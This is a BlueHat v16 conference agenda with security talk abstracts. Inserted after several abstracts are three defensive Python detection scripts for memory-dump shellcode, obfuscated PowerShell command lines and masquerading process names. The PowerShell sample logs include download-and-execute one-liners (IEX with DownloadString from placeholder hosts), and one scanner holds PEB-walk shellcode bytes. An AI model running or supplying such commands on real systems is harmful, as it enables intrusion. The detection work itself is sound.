The BlueHat conference is dedicated to educating Microsoft engineers and executives on current and emerging security threats, helping them address security issues in Microsoft products and services and protect customers. BlueHat is a great opportunity for us to bring the brightest minds in the security ecosystem together to discuss and tackle some of the biggest challenges facing the industry today.
BlueHat v16 General Sessions
November 3-4, 2016
Microsoft Conference Center
16070 NE 36th St, Redmond, WA 98052
Please keep an eye on our BlueHat Blog as we will release more information and previews for BlueHat v16.
External attendance at the BlueHat conference is by invitation only. All invited attendees will receive an email with a registration link and the conference agenda in September.
Thursday, November 3rd, 2016
9:00 - 9:50 AM | TBD | TBD | Keynote
Track 1 - Opening
10:00 - 10:50 AM | Alex Weinert and Dana Kaufman | Microsoft
Identity Protection at scale - A Year in the Trenches with Microsoft Identity Protection team
Microsoft is one of the largest identity providers in the world. Between Microsoft account, Microsoft’s consumer system which supports Outlook, Xbox, OneDrive, and more; and Azure Active Directory, which supports virtually all enterprise identity deployments, Microsoft’s Identity team supports more than 2B identities in every market and services over 14B logins every day. The Identity Protection team is responsible for ensuring that access is granted only to account owners, and that those account owners are not fraudsters. In this session, we’ll provide an overview of the protection systems in play, including our new Azure Active Directory Identity Protection product, how we see fraudsters adapting to different protection systems, and industry trends in a world where high stakes attacks meet high tech adaptive countermeasures. We’ll punctuate the talk with a few scary stories from the front lines, and our forecast for the future of identity protection.
11:00 - 11:50 AM | Daniel Edwards and Stirling McBride | Microsoft
Threat Intelligence Systems
The new buzzword on the street is Threat Intelligence. What exactly is threat intelligence? How does a piece of data go from ordinary data to threat intelligence? This talk will first walk you through the process of taking data and producing Threat Intelligence and then how one might integrate such a data source into their service.
Track 1 - Threat Landscape
1:00 - 1:50 PM | Peter Hlavaty | Tencent
You didn't see it coming? "Dawn of hardened Windows Kernel"
Over the past few years our team has been focusing on different operating systems, including the Microsoft Windows kernel. Honestly, our first pwn of the Windows kernel was not that challenging: there were a number of available targets with a friendly environment for a straightforward pwn, from user mode up to reliable kernel code execution.
However, step by step, security policies continue to evolve, and it becomes more troublesome to choose an ideal attack surface from the various sandboxes. In addition, what steps to follow when digging for security holes depends highly on the chosen target. In general, a few common strategies are available for researchers to choose from: e.g. choose an “unknown” target which hasn't been researched before; select a well-fuzzed or well-audited one; or research kernel module internals to find “hidden” attack surfaces which are not explicitly interconnected. In the first part of the talk we introduce our methodology for selecting targets, along with the cost of the tricks needed to choose seemingly banned targets, illustrated by notable examples.
After getting hands on a potential bug in the targeted sandbox, it is time for Microsoft Windows' hardening efforts to put the attacker in a corner. Strong mitigations are being introduced more frequently than ever, in a promising direction which cuts off a lot of attack surface and kills several exploitation techniques. We will show the difficulties of developing universal exploitation techniques, and demonstrate the technical level needed depending on the code quality of the target. We will examine how different it becomes in the era of Redstone and following versions, even with those techniques and a good vulnerability in hand. How has it changed the attacker landscape, and how will it (and will it not) kill those techniques and applications? Will it really change the game or not?
2:00 - 2:50 PM | Genghis Karimov | Microsoft
Win32k Security Improvements: Past & Present
Win32k is a large subsystem of the Windows OS responsible for UI, graphics and input tasks. Having been part of most Windows releases, from Windows 3.x to Windows 10, the Win32k subsystem teaches a unique lesson in managing a large codebase through its natural growth, from the perspective of reliability and security. This talk chronicles the codebase throughout the major releases: how macro and micro design decisions within the component translate to security risk, and what famous attacks Win32k vulnerabilities were leveraged for. Most of the discussion will be dedicated to a technical overview of Win32k-specific vulnerabilities and the mitigations for them.
3:00 - 3:50 PM | Jessy Campo and Thomas Dupuy | ESET
Visiting the Bear Den
Sednit, a.k.a. Fancy Bear/APT28/Sofacy, is a group of attackers operating since at least 2006 whose main objective is to steal confidential information from specific targets. Over the past two years, this group's activity has increased significantly, in particular with numerous attacks against foreign affairs ministries and embassies all over the world. Technically speaking, Sednit is probably one of the best espionage groups out there. Not only have they created a complex software ecosystem, composed of tens of different components, but they also regularly come out with 0-day exploits. Also remarkable is their ability to very quickly integrate newly published techniques into their toolkit. This talk presents the results of a two-year hunt after Sednit, during which we dug up and analyzed much of their software. In particular, we will delve into the technical details of their most impressive components:
During our tracking, we also gained great visibility into Sednit's post-infection modus operandi, a world full of Mimikatz and various custom hacking tools.
4:00 - 4:50 PM | Cooper Quintin | Electronic Frontier Foundation
I Got a Letter From the Government the Other Day... Unveiling a Campaign of Intimidation, Kidnapping, and Malware in Kazakhstan
This report covers a campaign of phishing and malware which we have named “Operation Manul” and which, based on the available evidence, we believe is likely to have been carried out on behalf of the government of Kazakhstan against journalists, dissidents living in Europe, their family members, known associates, and their lawyers. Many of the targets are involved in litigation with the government of Kazakhstan in European and American courts whose substance ranges from attempts by the government of Kazakhstan to unmask the administrators behind an anonymous website that publishes leaks alleging government corruption (Kazaword) to allegations of kidnapping.
Our research suggests links between this campaign and other campaigns that have been attributed to an Indian security company called Appin Security Group. A hired actor is consistent with our findings on the Command and Control servers related to this campaign, which included web-based control panels for multiple RATs, suggesting that several campaigns were being run at once. A hired actor may also explain the generic and uninspired nature of the phishing, which often took the form of an email purporting to contain an invoice or a legal document with an attachment containing a blurry image. This talk will cover the report in detail. We will also go into detail about the often low-tech, unsophisticated attack methods which are commonly used against journalists and dissidents, and what security researchers and defenders at Microsoft and elsewhere can do to stop these sorts of attacks and keep people safe from authoritarian governments.
Friday, November 4th, 2016
Track 1 - The Cloud
9:00 - 9:50 AM | Satoshi Tanda and Ahmed Samy | Sophos
Hypervisors in Your Toolbox: Monitoring and Controlling System Events with HyperPlatform
Virtualization software has been used extensively for security research, and countless analysis systems based on virtualization technology (VT) have been invented over more than a decade. Regardless, there is no suitable hypervisor to serve as a platform for developing such VT-based analysis systems on Windows. Lightweight hypervisors for Windows lack support for modern platforms, and comprehensive, consumer-oriented hypervisors and emulators are either overly intricate to quickly take advantage of VT or excessively slow for day-to-day usage. This talk presents HyperPlatform, a thin hypervisor designed as a VM-exit filtering platform for Windows. Using Intel VT-x and extended page tables, this platform gives researchers the ability to flexibly handle a new class of system events and rapidly implement hypervisor-based tools with high compatibility and efficiency. The talk will also introduce some HyperPlatform-based tools, with live demos against real malware demonstrating various example application scenarios of HyperPlatform.
10:00 - 10:50 AM | Saruhan Karademir | Microsoft
Breaking Things Early: Designing Secure Containers
In Windows Server 2016, we introduced Windows Server Containers, a modern way to deploy software. This allows our internal and external customers to leverage the Windows platform in the new ‘cloud’ architecture model of microservices and continuous integration. Along with Windows Server Containers, we also introduced Hyper-V Containers, which have a strictly enforced isolation boundary that’s purpose-built for hostile multi-tenant scenarios. Hosting and utilizing containers is a large part of Azure’s future strategy, including components such as the Azure Container Service and AzureML. The Windows Container platform also lays the foundation for many future features in client and server Windows. Because of the critical nature of this feature, WDG Security Assurance embedded its members into the development process of Windows Containers. This new approach integrated security knowledge into the design and implementation of the features themselves, moving the bar for how security teams should collaborate with feature teams.
In this talk, we will discuss the architecture of Windows Containers and highlight the differences between Hyper-V Containers and Windows Server Containers. This will include a comparison of the threat model between the two flavors as well as a deeper look at the changes made to Hyper-V. In addition, we will present the details of our embedded security partnership with the feature teams that built Containers. We will show the resulting impact of this collaboration by diving into specific design changes, including changes in the user model of Windows Containers as well as the Xenon storage subsystem.
11:00 - 11:50 AM | Pete Loveless and Fred Aaron | Microsoft
In-memory compromise detection as an Azure service
Security analysis of Azure crash dumps is a new Azure threat detection service, and in this talk we’ll explore some of the most sophisticated malware it's found. We’ll present an overview of how our service runs in Azure, and explain where the dumps we’re analyzing come from. We’ll explain in detail some of the key behavioral attributes our service looks for in order to detect malicious activity, for example: PEB locator functionality used in shellcode to access core Windows APIs, reflective injection using reflective loaders, custom PE or stripped MZ headers, and process hollowing. We’ll describe a few examples of malware we've found that demonstrate the very behaviors and attributes our service is designed to detect. Finally, we’ll discuss ways in which the security community can collaborate with us to help us build even better detections that help Azure and Azure customers defend against security threats.
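The indicators listed above are concrete enough to sketch as a scanner. What follows is an added example, not code from the Azure service or the speakers: it models a dump's committed regions with a simplified Region record (an assumption; real dump parsers expose far more) and scores each one for PEB-locator instruction sequences, a PE header sitting in non-image memory, and a PE signature whose MZ magic has been stripped. Process hollowing is not modelled. The sample regions are constructed inline.

```python
"""Heuristic scan of dump memory regions for three of the in-memory indicators
named above: PEB-locator shellcode, PE images loaded into private memory
(reflective injection) and stripped MZ headers. Added example run over
constructed sample regions; not the Azure service's own code."""
import re
import struct
from dataclasses import dataclass

# Encodings of the PEB lookups position-independent shellcode uses to reach
# the loaded-module list: fs:[0x30] on x86, gs:[0x60] on x64.
PEB_LOCATOR_PATTERNS = {
    "x86 mov eax, fs:[0x30]": re.compile(rb"\x64\xa1\x30\x00\x00\x00"),
    "x86 mov r32, fs:[0x30]": re.compile(rb"\x64\x8b[\x05\x0d\x15\x1d\x35\x3d\x2d]\x30\x00\x00\x00"),
    "x64 mov r64, gs:[0x60]": re.compile(rb"\x65\x48\x8b[\x04\x0c\x14\x1c\x2c\x34\x3c]\x25\x60\x00\x00\x00"),
}


@dataclass
class Region:
    """One committed region as a dump would describe it (assumed, simplified layout)."""
    name: str
    base: int
    mem_type: str        # "MEM_IMAGE", "MEM_PRIVATE" or "MEM_MAPPED"
    executable: bool
    data: bytes


def find_peb_locators(data):
    """Offsets and names of PEB-locator instruction sequences in a byte buffer."""
    return sorted((m.start(), name)
                  for name, pat in PEB_LOCATOR_PATTERNS.items()
                  for m in pat.finditer(data))


def pe_header_at_base(data):
    """Return (has_mz_magic, e_lfanew) if a 'PE\\0\\0' signature is reachable through
    the e_lfanew field at +0x3C, else None. A stripped header keeps the signature
    but overwrites the 'MZ' magic so naive carvers miss it."""
    if len(data) < 0x40:
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 4 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    return data[:2] == b"MZ", e_lfanew


def score_region(region):
    """Score one region; the weights are illustrative, not the service's."""
    findings = []
    if region.executable:
        for off, name in find_peb_locators(region.data):
            findings.append(("peb_locator", f"{name} at +0x{off:x}"))
    hdr = pe_header_at_base(region.data)
    if hdr is not None:
        has_mz, e_lfanew = hdr
        if region.mem_type != "MEM_IMAGE":
            findings.append(("pe_in_private_memory",
                             f"PE header in {region.mem_type} region (reflective load?)"))
        if not has_mz:
            findings.append(("stripped_mz",
                             f"PE signature at +0x{e_lfanew:x} but MZ magic missing"))
    weights = {"peb_locator": 3, "pe_in_private_memory": 4, "stripped_mz": 3}
    score = sum(weights[kind] for kind, _ in findings)
    return {"name": region.name, "base": region.base, "score": score, "findings": findings}


def scan_regions(regions):
    """Rank regions by score, highest first."""
    return sorted((score_region(r) for r in regions), key=lambda r: -r["score"])


# --- constructed sample regions ---------------------------------------------
def _pe_stub(strip_mz=False):
    """Minimal PE-shaped buffer: MZ magic (optional), e_lfanew, PE signature."""
    buf = bytearray(0x200)
    buf[0:2] = b"\x00\x00" if strip_mz else b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)      # e_lfanew -> PE signature
    buf[0x80:0x84] = b"PE\x00\x00"
    return bytes(buf)


# x86 PEB walk prologue: mov eax, fs:[0x30]; mov eax, [eax+0xC]; mov esi, [eax+0x14]
_PEB_WALK = b"\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x14"

SAMPLE_REGIONS = [
    Region("ntdll.dll (legit image)", 0x77000000, "MEM_IMAGE", True, _pe_stub()),
    Region("shellcode heap", 0x00A40000, "MEM_PRIVATE", True,
           b"\x90" * 0x80 + _PEB_WALK + b"\xcc" * 0x40),
    Region("reflective loader", 0x02F00000, "MEM_PRIVATE", True, _pe_stub()),
    Region("stripped header", 0x03100000, "MEM_PRIVATE", True, _pe_stub(strip_mz=True)),
    Region("data only", 0x00500000, "MEM_PRIVATE", False, b"\x00" * 0x100),
]

if __name__ == "__main__":
    for r in scan_regions(SAMPLE_REGIONS):
        print(f"{r['score']:2d} {r['name']:<26} 0x{r['base']:08x} {[f for _, f in r['findings']]}")
```

The PEB patterns are the common fs:[0x30] and gs:[0x60] loads; shellcode that reaches the PEB through other TEB offsets or computes the offset at runtime will not match, so treat a hit as a lead for disassembly rather than a verdict, and expect some legitimate position-independent code (packers, JIT stubs) to produce the same pattern. A PE header in MEM_PRIVATE memory is the stronger of the three signals because nothing in the normal loader path puts one there.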
11:30 - 11:55 AM | Michael Scovetta and Jan Vandenbos | Microsoft
Security of Open Source at Microsoft
Microsoft uses a vast and increasing number of open source components to deliver products and services to customers. These components provide enormous value, but introduce some significant security risk. During this session, we'll cover the following challenges and how we're addressing them:
* How exposed are Microsoft products and services to vulnerabilities present in open source components?
* What security work should engineers be doing when using open source?
* Which metrics can be used to indicate the risk inherited when using an open source component?
* How well do available security tools find actionable vulnerabilities?
* How can machine learning and related approaches be used to identify security risk across many projects, including detection of intentional backdoors in open source components?
* How do we handle responsible disclosure when critical vulnerabilities are found in open source components?
We'll conclude with a demo of some tooling available today and present a few of the notable vulnerabilities found through the processes created.
Track 1 - Exploit, Parry, Strike
1:00 - 1:50 PM | Haifei Li | Intel Security
All the Weird Things I've Found on Office
In this presentation, I will talk about the weird issues I've found when researching Microsoft Office applications, as well as some of my thoughts about Office security. The issues I will talk about include (but may not be limited to): 1) The BadWinmail (CVE-2015-6172) bug in Outlook. 2) The Protected Mode bypass issue via XLA (CVE-2016-3279). 3) A Protected Mode bypass issue in the "cloud" world. 4) A critical vulnerability in the VBA engine (even when VBA macros are disabled). 5) An Outlook "dead loop" issue. I hope this talk will shed some light on security research on Microsoft Office, which is quite important for overall enterprise security.
2:00 - 2:50 PM | Yunhai Zhang | NSFOCUS
How to Avoid Implementing an Exploit-Friendly JIT
3:00 - 3:50 PM | Daniel Bohannon | Mandiant
Invoke-Obfuscation: Powershell obFUsk8tion Techniques & How To (Try To) D""e'Tec'T 'Th'+'em'
The very best attackers hide their PowerShell commands from A/V and application whitelisting technologies using encoded commands and memory-only payloads. These techniques keep Blue Teams from determining what was executed on a target system. However, network defenders are catching on, and state-of-the-art detection tools now monitor the command line arguments of powershell.exe, either in real time or from event logs.
This talk will highlight a dozen never-before-seen techniques for obfuscating PowerShell command line arguments. As an incident responder at Mandiant, I have seen attackers use a handful of these methods to evade basic command line detection mechanisms. As I share these techniques I will emphasize the value each technique provides to the attacker. Next, I will introduce three new layers of obfuscation that can be applied independently or collectively to any PowerShell command. These layers include: 1) directly manipulating PowerShell and .NET cmdlets, functions and arguments, 2) string manipulation applied to single commands or entire scripts, and 3) PowerShell command input parameters that allow one to hide command line arguments from appearing for powershell.exe.
Updated PowerShell event logging mitigates many of the detection challenges that obfuscation introduces. However, many organizations do not or cannot enable these features. Therefore, I will provide techniques the Blue Team can use to detect the presence of these obfuscation methods in command line arguments. I will also highlight methods using C# within powershell.exe that enable the attacker to execute .NET functions without being recorded in PowerShell event logs. Additionally, I will discuss ways to perform remote downloads via SendKeys and COM objects. I will conclude this talk by highlighting the public release of Invoke-Obfuscation.ps1. This tool applies the aforementioned obfuscation techniques to user-provided commands and scripts to evade command line detection mechanisms.
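As an added example run over constructed process-creation log lines (not Invoke-Obfuscation's code and not any vendor's detection logic), the following scores powershell.exe command lines for the indicators discussed above: backtick escapes, string concatenation, [char] casts, -f format reordering, random case, -EncodedCommand (decoded and re-scored), plus two launcher shapes that are my reading of the third layer, stdin piping and $env: indirection. The weights and the threshold are assumptions.

```python
"""Score PowerShell command lines for the obfuscation indicators discussed above.
Added example over constructed process-creation log lines; not Invoke-Obfuscation
or any vendor's detection logic. Weights are illustrative."""
import base64
import re

ENCODED_B64 = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
BACKTICK_ESCAPE = re.compile(r"`[A-Za-z]")          # backtick splitting a keyword

# (name, weight per hit, pattern); hits are capped at 3 per indicator.
INDICATORS = [
    ("string_concat",     2, re.compile(r"['\"]\s*\+\s*['\"]")),          # 'I'+'EX'
    ("char_cast",         2, re.compile(r"(?i)\[char\]")),                  # [char]72
    ("format_reorder",    2, re.compile(r'(?i)"\{\d+\}[^"]*"\s*-f\s')),     # ("{1}{0}" -f ...)
    ("invoke_expression", 2, re.compile(r"(?i)\b(iex|invoke-expression)\b")),
    ("hidden_window",     1, re.compile(r"(?i)-w\w*\s+h(idden)?\b")),       # -w hidden
    ("env_indirection",   1, re.compile(r"(?i)\$env:\w+")),                 # IEX $env:x
    ("stdin_launcher",    3, re.compile(r"(?i)powershell(?:\.exe)?\s+-\s*(?:\"|$)")),
]


def extract_encoded_command(cmdline):
    """Return the base64 argument of -e / -ec / -enc / ... / -EncodedCommand, or None.
    PowerShell accepts any unambiguous prefix of the parameter name."""
    toks = cmdline.split()
    for i in range(len(toks) - 1):
        t = toks[i]
        if t[:1] not in "-/":
            continue
        p = t[1:].lower()
        if p and "encodedcommand".startswith(p) and ENCODED_B64.fullmatch(toks[i + 1]):
            return toks[i + 1]
    return None


def decode_encoded_command(b64):
    """-EncodedCommand payloads are UTF-16LE; pad and decode leniently."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le", errors="replace")


def case_flip_ratio(text):
    """Highest ratio of upper/lower transitions inside any alphabetic run of 6+ chars.
    Camel case stays low (DownloadString ~0.23); hIdDeN scores 1.0."""
    best = 0.0
    for run in re.findall(r"[A-Za-z]{6,}", text):
        flips = sum(1 for a, b in zip(run, run[1:]) if a.isupper() != b.isupper())
        best = max(best, flips / (len(run) - 1))
    return best


def score_command_line(cmdline, threshold=4):
    findings = {}
    text = cmdline
    b64 = extract_encoded_command(cmdline)
    if b64:
        findings["encoded_command"] = 3
        # score what the blob decodes to, not just the launcher around it
        text = cmdline.replace(b64, "") + " " + decode_encoded_command(b64)
    backticks = len(BACKTICK_ESCAPE.findall(text))
    if backticks:
        findings["backtick_escape"] = min(backticks, 3)
    norm = text.replace("`", "")      # the parser drops these too
    for name, weight, pat in INDICATORS:
        hits = len(pat.findall(norm))
        if hits:
            findings[name] = weight * min(hits, 3)
    if case_flip_ratio(norm) >= 0.5:
        findings["case_flipping"] = 2
    score = sum(findings.values())
    return {"cmdline": cmdline, "score": score, "findings": findings,
            "suspicious": score >= threshold}


def triage(log_lines, threshold=4):
    return [score_command_line(line, threshold) for line in log_lines]


# --- constructed sample log lines ----------------------------------------------
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
_ENC = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_LOG = [
    # benign administrative use
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "powershell.exe -Command \"Get-Service | Where-Object {$_.Status -eq 'Running'}\"",
    # encoded command plus hidden window
    f"powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand {_ENC}",
    # call operator on concatenated strings: no literal IEX on the command line
    "powershell -c \"&('I'+'EX') (('Ne'+'w-Ob'+'ject') Net.WebClient).DownloadString('http://example.invalid/p')\"",
    # backtick escapes, case flipping and [char] casts
    "powershell.exe -W hIdDeN -nOp iN`vo`Ke-eXpRe`SsIoN ([cHaR]72+[cHaR]105+[cHaR]33)",
    # stdin launcher: the payload sits on cmd.exe's command line, not powershell.exe's
    "cmd.exe /c \"echo IEX(New-Object Net.WebClient).DownloadString('http://example.invalid/s') | powershell.exe -\"",
]

if __name__ == "__main__":
    for r in triage(SAMPLE_LOG):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{r['score']:2d} {flag:<10} {r['findings']}  {r['cmdline'][:70]}")
```

Decoding the -EncodedCommand blob matters more than any single regex: it is UTF-16LE, and the decoded text should be fed through the same rules. Stripping backticks before the keyword match is what lets the rule see the split-up Invoke-Expression in the fourth sample. The stdin launcher is the reminder that the payload may not be on powershell.exe's command line at all, so the parent's command line (cmd.exe here) has to be scored as well; where script block logging can be enabled it records the de-obfuscated block and is the better control.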
4:00 - 4:50 PM | David Weston, Matt Miller and Peleus Uhley | Microsoft/Adobe
A Year of Hardening Adobe Flash Player
Adobe Flash Player has become a preferred target for browser-based attacks over the past year and a half. In response to this shift, Adobe, Microsoft, and Google have collaborated on hardening Adobe Flash Player to make it more difficult for attackers to find and exploit Flash Player vulnerabilities. In this presentation, we’ll analyze the timeline and trends related to attacks against Flash Player and describe the hardening improvements that have been made along the way. We’ll show how attackers have responded to these improvements and conclude with a summary of what the landscape looks like today.
Track 2 - Discovery
9:00 - 9:50 AM | Alex Ionescu | Crowdstrike
Gaining Visibility into Linux Binaries on Windows - How to defend and understand WSL
The release of the Windows Subsystem for Linux (WSL) brings exciting new changes to the Windows ecosystem: the ability to run unmodified Linux ELF binaries in an environment that provides a 75%+ system call compatibility layer with the Linux kernel API/ABI, access to sockets, the file system, pipes, and a private driver/IPC bus mechanism, all while leveraging the Drawbridge "Pico Process" research. At the same time, today's defense products and engines are not adapted to this reality. Forensically difficult to understand, poorly documented internally outside of some technical blog posts, and unusual by design (ELF binaries utilizing a kernel driver for I/O, leveraging poorly understood NTFS features), WSL is a great place for future attackers to invade, if the blue team doesn't get there first.
This presentation will expose some of the difficulties in dealing with WSL processes for forensics, IR, and endpoint detection and response. It will also call out certain undisclosed risks and actual vulnerabilities, regarding file system EoP attacks, mitigation bypasses, system call vulnerabilities, and bugs regarding Windows handle usage. As future Windows releases increase the capabilities of WSL, it's important to address these issues systematically with fuzzing, SDL processes, and a better understanding of the risks and interactions between NT and Linux. Finally, we'll provide ideas & suggestions for how security-minded vendors and administrators can get some visibility into WSL.
10:00 - 10:50 AM | Andrea Allievi and Richard Johnson | Microsoft/Cisco Systems
Harnessing Intel Processor Trace on Windows for Vulnerability Discovery
This talk will explore Intel Processor Trace, the new hardware branch tracing feature included in Intel Skylake processors. We will explain the design of Intel Processor trace and detail how the current generation implementation works including the various filtering modes and output configurations.
This year we designed and developed the first open source Intel PT driver for the Microsoft Windows operating system. We will discuss the architecture of the driver and the large number of low level programming hurdles we had to overcome throughout its development to program the PMU, including registering Performance Monitoring Interrupts (PMI), locating the Local Vector Table (LVT) Performance Monitor timer register, bypassing the TLB and cache by managing physical memory, and more. We will demonstrate the usage of Intel PT in Windows environments for diagnostic and debugging purposes and then discuss how we've harnessed this branch tracing engine for guided fuzzing.
This year we have added the Intel PT tracing mode as an engine for targeting Windows binaries in the widely used evolutionary fuzzer, American Fuzzy Lop. This fuzzer is capable of using random mutation fuzzing with a code coverage feedback loop to explore new areas. Using our new Intel PT driver for Windows, we provide the fastest hardware supported engine for targeting binaries with evolutionary fuzzing. In addition we have added new functionality to AFL for guided fuzzing, which allows users to specify targeted areas on a program control flow graph that are of interest. This can be combined with static analysis results or known-vulnerable locations to help automate the creation of trigger inputs to reproduce a vulnerability without the limits of symbolic execution. To keep performance as the highest priority, we have also created new methods for efficiently encoding weighted graphs into an efficiently comparable bytemap.
11:00 - 11:25 AM | Casey Smith | Veris Group ATD
Trusted Things That Execute
As organizations embrace the new whitelisting model, it becomes imperative to understand what applications you trust. Solutions such as AppLocker and Device Guard go a long way to provide increased defense. However, attackers can leverage existing, default, signed tools to execute arbitrary code. This talk will describe multiple utilities that have been discovered to execute code in unexpected ways. The methods we use do not rely on exploitation at all; in fact, they follow recommended patterns for developers. The purpose of this talk is to inform defenders, as well as provide insight into uncovering these patterns at scale.
11:30 - 11:55 AM | John Booth | Microsoft
Detecting Malicious Masquerading Processes
Every year thousands of organizations are victims of cyber-attacks leading to potential misuse of their resources, loss of billions of records and damage to their reputation. The attacker will typically run malicious code on victim machines to collect data, control the machine or for other common purposes. One way to achieve this is to drop a malicious binary with a name similar to that of a common process; the attacker's intent is to go unnoticed by the analyst's eye. Another option is to inject malicious code into an existing process, making the malicious code appear to be running as part of a legitimate process. In this talk, we will discuss a method to scan a large amount of Windows process creation event data to detect some of the attacker tactics above. We suggest a scoring model to decide which processes to present to the analyst as suspicious, and show how we’ve applied this work to internal and customer data.
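A minimal version of the scoring idea, as an added example that is not the speakers' model: each process-creation event is checked against an assumed baseline of a few system process names with their expected directory and parent, and an unknown name is compared with that baseline by edit distance after mapping common digit-for-letter swaps. The events, the baseline table and the weights are constructed for the example.

```python
"""Score Windows process-creation events for name masquerading: a binary named
like a system process (digit swaps, one or two edits away) or a real system
process name running from the wrong directory or under the wrong parent.
Added example over constructed events; baseline and weights are assumptions."""
import ntpath
from dataclasses import dataclass

# Assumed baseline: expected directory and expected parent(s) for a few
# common system processes. None means "any parent".
BASELINE = {
    "svchost.exe":    (r"c:\windows\system32", {"services.exe"}),
    "lsass.exe":      (r"c:\windows\system32", {"wininit.exe"}),
    "csrss.exe":      (r"c:\windows\system32", {"smss.exe"}),
    "smss.exe":       (r"c:\windows\system32", {"system", "smss.exe"}),
    "explorer.exe":   (r"c:\windows", {"userinit.exe", "explorer.exe"}),
    "powershell.exe": (r"c:\windows\system32\windowspowershell\v1.0", None),
}

# Digit-for-letter swaps an analyst's eye glosses over: svch0st, 1sass, 3xplorer
HOMOGLYPHS = str.maketrans("013", "ole")


@dataclass
class ProcEvent:
    image: str     # full path of the new process
    parent: str    # full path of the creating process
    user: str


def levenshtein(a, b):
    """Classic edit distance with a rolling row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def nearest_known(name):
    """(baseline name, edit distance) for the closest known process name."""
    return min(((known, levenshtein(name, known)) for known in BASELINE),
               key=lambda kv: kv[1])


def score_event(ev):
    name = ntpath.basename(ev.image).lower()
    directory = ntpath.dirname(ev.image).lower()
    parent = ntpath.basename(ev.parent).lower()
    score, findings = 0, []
    if name in BASELINE:
        expected_dir, expected_parents = BASELINE[name]
        if directory != expected_dir:
            score += 4
            findings.append(f"{name} running from {directory}, expected {expected_dir}")
        if expected_parents is not None and parent not in expected_parents:
            score += 3
            findings.append(f"{name} spawned by {parent}, expected {sorted(expected_parents)}")
    else:
        known, dist = nearest_known(name.translate(HOMOGLYPHS))
        if dist == 0:
            score += 6
            findings.append(f"{name} is a digit-for-letter lookalike of {known}")
        elif dist == 1:
            score += 5
            findings.append(f"{name} is one edit away from {known}")
        elif dist == 2:
            score += 3
            findings.append(f"{name} is two edits away from {known}")
    return {"image": ev.image, "user": ev.user, "score": score, "findings": findings}


def rank_events(events, threshold=3):
    """Events worth an analyst's attention, highest score first."""
    scored = [score_event(e) for e in events]
    return sorted((s for s in scored if s["score"] >= threshold), key=lambda s: -s["score"])


# --- constructed sample events -------------------------------------------------
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\services.exe", r"NT AUTHORITY\SYSTEM"),
    ProcEvent(r"C:\Users\bob\AppData\Local\Temp\svchost.exe", r"C:\Windows\explorer.exe", r"CORP\bob"),
    ProcEvent(r"C:\Windows\System32\svch0st.exe", r"C:\Windows\System32\services.exe", r"NT AUTHORITY\SYSTEM"),
    ProcEvent(r"C:\Windows\System32\lsasss.exe", r"C:\Windows\System32\wininit.exe", r"NT AUTHORITY\SYSTEM"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe", r"CORP\bob"),
    ProcEvent(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", r"CORP\bob"),
]

if __name__ == "__main__":
    for r in rank_events(SAMPLE_EVENTS):
        print(f"{r['score']:2d} {r['user']:<22} {r['image']}")
        for f in r["findings"]:
            print(f"     - {f}")
```

The baseline has to be complete for the environment it runs in, or legitimate names that happen to sit two edits from a system process become noise; in practice the list is built from the fleet's own process inventory, and a path-plus-parent mismatch on a known name is a far stronger signal than edit distance alone. Injection into an existing process, the second tactic in the abstract, leaves nothing in creation events and needs other telemetry.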
Track 2 - Landscape Reaction
1:00 - 1:50 PM | Michiko Short | Microsoft
Windows Credential Protections: Where are we now?
To understand how to protect against credential theft & lateral traversal attacks (Pass-the-Hash), we need to understand the conditions required for credential theft. Then it is easy to see how the various Windows and Domain Controller features address various parts of the problem.
2:00 - 2:50 PM | Rohit Kapoor, Murali Puthanveetil and Vinay Prabhushankar | Microsoft
Threat Modeling at Cloud Speed - Queryable & Composable Threat Models
As security engineers, we have all created & reviewed several Threat models. Ask yourself if the following situations seem familiar:
Solution: The CRM team has built a tool to address the above needs. We have been using it for threat model reviews with positive feedback from our feature teams. In this talk, we cover the following:
1. A demo of how the tool addresses the above scenarios.
2. An architectural overview of the system's key pieces (relational store, drawing engine, web front end).
3. How to prototype and onboard to the system.
3:00 - 3:25 PM | Jon DeHart | Microsoft
Redesigning the Edge with Just-In-Time Network Access
As built-in application layer security becomes more common, network security must advance with it. The antiquated model of edge-based access control via firewall is proving more taxing on network administrators and less maintainable as the asset footprint increases. To combat this, network security must be brought back down to the host layer, and firewalls must be re-engineered to act as central command for users and groups while taking advantage of standard OS security functionality. This talk will conceptually discuss the opportunity to replace edge firewalls with request-based ACL changes managed by a centralized logic engine.
3:30 - 3:55 PM | Marianne Malle and Patrick Estavillo | Microsoft
Ransomware Threat Landscape and Retrospect
In 2016 alone, ransomware campaigns have become even more prominent, showing more activity than was seen in the past few years. For this BlueHat session, we will share some key summaries of what has happened in the ransomware threat landscape over the last 10 months, and how it continues to be a growing problem for customers. As part of this, we will focus a portion of the presentation on a deep dive into the top ransomware families, which have been steadily on the rise for the past months. We will also explore methods of delivery, variant updates, and behaviors that these threats exhibit. At the end of this talk, we will also share insight into current research and response efforts, as well as future plans in our fight against ransomware and ransomware infection, how we can mitigate these threats, and recommendations when faced with these types of threats.
4:00 - 4:50 PM | David Molnar | Microsoft
Fuzzing Cloud "Project Springfield"
